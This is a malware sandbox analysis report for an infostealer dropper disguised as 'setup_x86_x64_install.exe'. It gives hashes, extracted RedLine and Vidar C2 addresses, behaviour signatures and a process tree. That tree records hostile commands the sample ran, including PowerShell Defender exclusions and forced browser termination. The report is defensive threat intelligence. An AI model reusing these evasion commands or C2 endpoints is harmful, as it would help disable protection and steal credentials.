Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

11/10/2021, 20:45

211011-zjxjlsabbm 10

11/10/2021, 13:10

211011-qegsxshcfp 10

11/10/2021, 10:55

211011-mz7y3ahaak 10

10/10/2021, 19:24

211010-x4mtssgae2 10

Analysis

  • max time kernel
    1805s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    10/10/2021, 19:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.9MB

  • MD5

    a4d23ac3c7172b9aa02e35b6bf0fd21f

  • SHA1

    0326aab7deddfefc048c9a67ac9ce4ee14ea9003

  • SHA256

    9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806

  • SHA512

    9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10

Score
10/10
redlinesocelarsvidar933sadsheaspackv2discoveryevasioninfostealerpersistencespywarestealerthemidatrojan

Malware Config

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

sad

C2

107.172.13.162:42751

Extracted

Family

vidar

Version

41.2

Botnet

933

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    933

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
    evasion
  • UAC bypass 3 TTPs
    evasiontrojan
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 4 IoCs
    stealer
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 47 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Windows security modification 2 TTPs 13 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 12 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 6 IoCs
    evasion
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 23 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    PID:3924
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:6436
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2784
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2696
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2476
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1876
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1468
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1304
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1276
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1072
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        • Modifies registry class
                        PID:68
                        • C:\Users\Admin\AppData\Roaming\rsutirc
                          C:\Users\Admin\AppData\Roaming\rsutirc
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:7852
                          • C:\Users\Admin\AppData\Roaming\rsutirc
                            C:\Users\Admin\AppData\Roaming\rsutirc
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4964
                        • C:\Users\Admin\AppData\Roaming\rsutirc
                          C:\Users\Admin\AppData\Roaming\rsutirc
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:1408
                          • C:\Users\Admin\AppData\Roaming\rsutirc
                            C:\Users\Admin\AppData\Roaming\rsutirc
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5736
                        • C:\Users\Admin\AppData\Roaming\rsutirc
                          C:\Users\Admin\AppData\Roaming\rsutirc
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:4284
                          • C:\Users\Admin\AppData\Roaming\rsutirc
                            C:\Users\Admin\AppData\Roaming\rsutirc
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:3940
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:316
                        • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2136
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4084
                            • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:4068
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:720
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  5⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:804
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:364
                                • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun152bab5a2de.exe
                                  Sun152bab5a2de.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2520
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2688
                                • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun15901f2f025e.exe
                                  Sun15901f2f025e.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2096
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    6⤵
                                      PID:7120
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        7⤵
                                        • Kills process with taskkill
                                        PID:620
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2916
                                  • C:\Users\Admin\AppData\Local\Temp\7zS4FF392F5\Sun15dbd675f871ca.exe
                                    Sun15dbd675f871ca.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2988
                                    • C:\Users\Admin\Pictures\Adobe Films\GZR3byHbAJ0Ttx8QkX8faIfJ.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\GZR3byHbAJ0Ttx8QkX8faIfJ.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4756
                                    • C:\Users\Admin\Pictures\Adobe Films\FDpLamubifIgLbolGKzYcZeX.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\FDpLamubifIgLbolGKzYcZeX.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2592
                                    • C:\Users\Admin\Pictures\Adobe Films\sljBtSp2JRwRM0wIzNXqPaEQ.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\sljBtSp2JRwRM0wIzNXqPaEQ.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:3776
                                    • C:\Users\Admin\Pictures\Adobe Films\_cVmi5dOtfAAbiYjhpvCaJVk.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\_cVmi5dOtfAAbiYjhpvCaJVk.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:2976
                                    • C:\Users\Admin\Pictures\Adobe Films\YJRsv4wH5HLrnEd_xXbwMnpp.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\YJRsv4wH5HLrnEd_xXbwMnpp.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of SetThreadContext
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4372
                                      • C:\Users\Admin\Pictures\Adobe Films\YJRsv4wH5HLrnEd_xXbwMnpp.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\YJRsv4wH5HLrnEd_xXbwMnpp.exe"
                                        7⤵
                                          PID:6304
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1732
                                          7⤵
                                          • Program crash
                                          PID:6956
                                      • C:\Users\Admin\Pictures\Adobe Films\oGlgrGSb6VwKYh6EL5ZuVBbI.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\oGlgrGSb6VwKYh6EL5ZuVBbI.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:3508
                                      • C:\Users\Admin\Pictures\Adobe Films\hBgcGPh88ckn76T6S3i4pXVo.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\hBgcGPh88ckn76T6S3i4pXVo.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4704
                                        • C:\Users\Admin\Pictures\Adobe Films\hBgcGPh88ckn76T6S3i4pXVo.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\hBgcGPh88ckn76T6S3i4pXVo.exe"
                                          7⤵
                                            PID:6112
                                        • C:\Users\Admin\Pictures\Adobe Films\_FwXIp2MDfoNbHg4GhMvADN3.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\_FwXIp2MDfoNbHg4GhMvADN3.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4716
                                          • C:\ProgramData\build.exe
                                            "C:\ProgramData\build.exe"
                                            7⤵
                                              PID:5160
                                          • C:\Users\Admin\Pictures\Adobe Films\S5WplqRBWu6f8S0sknjxrnck.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\S5WplqRBWu6f8S0sknjxrnck.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Windows security modification
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4032
                                            • C:\Users\Admin\AppData\Local\Temp\3a46f548-aaa0-4884-ab16-43f92af5a908\AdvancedRun.exe
                                              "C:\Users\Admin\AppData\Local\Temp\3a46f548-aaa0-4884-ab16-43f92af5a908\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3a46f548-aaa0-4884-ab16-43f92af5a908\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                              7⤵
                                                PID:6792
                                                • C:\Users\Admin\AppData\Local\Temp\3a46f548-aaa0-4884-ab16-43f92af5a908\AdvancedRun.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\3a46f548-aaa0-4884-ab16-43f92af5a908\AdvancedRun.exe" /SpecialRun 4101d8 6792
                                                  8⤵
                                                    PID:4216
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\S5WplqRBWu6f8S0sknjxrnck.exe" -Force
                                                  7⤵
                                                    PID:4952
                                                  • C:\Users\Admin\Pictures\Adobe Films\S5WplqRBWu6f8S0sknjxrnck.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\S5WplqRBWu6f8S0sknjxrnck.exe"
                                                    7⤵
                                                      PID:7016
                                                  • C:\Users\Admin\Pictures\Adobe Films\aohAticN6FQbEg1S5X3SCEYT.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\aohAticN6FQbEg1S5X3SCEYT.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:940
                                                  • C:\Users\Admin\Pictures\Adobe Films\V9sCLJ6mF0Gz9srxHeyJEwhd.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\V9sCLJ6mF0Gz9srxHeyJEwhd.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:5616
                                                  • C:\Users\Admin\Pictures\Adobe Films\IfpLSte_8CRDdbTnPVQF8V6F.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\IfpLSte_8CRDdbTnPVQF8V6F.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    PID:5432
                                                    • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                      "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                      7⤵
                                                        PID:4936
                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6136
                                                      • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:6116
                                                    • C:\Users\Admin\Pictures\Adobe Films\LehmtmMYRCJFR9Jpgfe3lWfp.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\LehmtmMYRCJFR9Jpgfe3lWfp.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:5408
                                                    • C:\Users\Admin\Pictures\Adobe Films\yb1wjzu581NyJrmIXIHHL2yw.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\yb1wjzu581NyJrmIXIHHL2yw.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5388
                                                    • C:\Users\Admin\Pictures\Adobe Films\qjAH9CFW9z2GVAvWemDVrcFx.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\qjAH9CFW9z2GVAvWemDVrcFx.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:5340
                                                    • C:\Users\Admin\Pictures\Adobe Films\gWYPkJhnmNOVPZuyx2xilPJ4.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\gWYPkJhnmNOVPZuyx2xilPJ4.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5184
                                                    • C:\Users\Admin\Pictures\Adobe Films\bEKQibFa3dQFJI0xsOviEklP.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\bEKQibFa3dQFJI0xsOviEklP.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5744
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 248
                                                        7⤵
                                                        • Program crash
                                                        PID:5376
                                                    • C:\Users\Admin\Pictures\Adobe Films\LQWFv0gZ7BmD1suTOVf36Ppb.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\LQWFv0gZ7BmD1suTOVf36Ppb.exe"
                                                      6⤵
                                                      • Drops file in Drivers directory
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:5888
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                        7⤵
                                                          PID:3940
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Checks processor information in registry
                                                            • Modifies registry class
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4512
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4512.0.1005254701\573548294" -parentBuildID 20200403170909 -prefsHandle 1424 -prefMapHandle 1400 -prefsLen 1 -prefMapSize 219808 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 1504 gpu
                                                              9⤵
                                                                PID:436
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4512.3.1898386709\814736366" -childID 1 -isForBrowser -prefsHandle 5452 -prefMapHandle 5448 -prefsLen 186 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 5464 tab
                                                                9⤵
                                                                  PID:5472
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4512.13.830287160\1930015613" -childID 2 -isForBrowser -prefsHandle 4008 -prefMapHandle 4032 -prefsLen 7358 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 4528 tab
                                                                  9⤵
                                                                    PID:6784
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4512.20.17916158\1680567585" -childID 3 -isForBrowser -prefsHandle 4712 -prefMapHandle 3004 -prefsLen 8272 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 5352 tab
                                                                    9⤵
                                                                      PID:7840
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                  7⤵
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:5400
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa72244f50,0x7ffa72244f60,0x7ffa72244f70
                                                                    8⤵
                                                                      PID:7520
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1732 /prefetch:8
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      PID:6584
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1684 /prefetch:2
                                                                      8⤵
                                                                        PID:4904
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2336 /prefetch:8
                                                                        8⤵
                                                                          PID:3828
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1376 /prefetch:1
                                                                          8⤵
                                                                            PID:7560
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                                            8⤵
                                                                              PID:7800
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                                                                              8⤵
                                                                                PID:1560
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
                                                                                8⤵
                                                                                  PID:8116
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3732 /prefetch:8
                                                                                  8⤵
                                                                                    PID:1268
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:8
                                                                                    8⤵
                                                                                      PID:8068
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:8
                                                                                      8⤵
                                                                                        PID:7408
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
                                                                                        8⤵
                                                                                          PID:2360
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:8
                                                                                          8⤵
                                                                                            PID:5276
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,1597629488946696752,8090994591252289188,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:8
                                                                                            8⤵
                                                                                              PID:4180
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
